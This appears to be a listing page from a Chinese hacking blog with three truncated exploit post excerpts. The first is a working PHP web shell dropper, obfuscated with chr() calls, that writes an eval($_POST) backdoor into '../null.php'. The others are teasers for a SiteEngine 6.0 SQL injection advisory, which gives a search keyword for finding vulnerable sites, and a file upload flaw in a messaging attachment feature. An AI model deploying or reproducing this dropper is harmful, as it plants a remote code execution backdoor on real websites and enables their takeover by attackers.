<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>[……]

阅读更多

Read More

#############################################################################
#标题:?? SiteEngine 6.0 SQL注入漏洞
#日期:??? 2010-11-25
#作者: Beach
#Team:????www.linux520.com
#厂商:?www.siteengine.netwww.boka.cn
#关键字:??? “Powered by SiteEngine”?? //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:[……]

阅读更多

Read More

发布日期:2012-04.8
发布作者: hackdn漏洞类型:文件上传
漏洞描述:zend编码解密的不完整,也懒得看代码了,用Tamper之类的插件测试的POST参数,反正就是$sFile = $oFile[‘name’];的过滤太傻瓜了,貌似 第5版本之后就修改了函数了。。这次是会员发站内短信上传附件的漏洞,问题出在pms.php上,具体代码分析懒得啰嗦了,POC就不放了,都懂的。[……]

阅读更多

Read More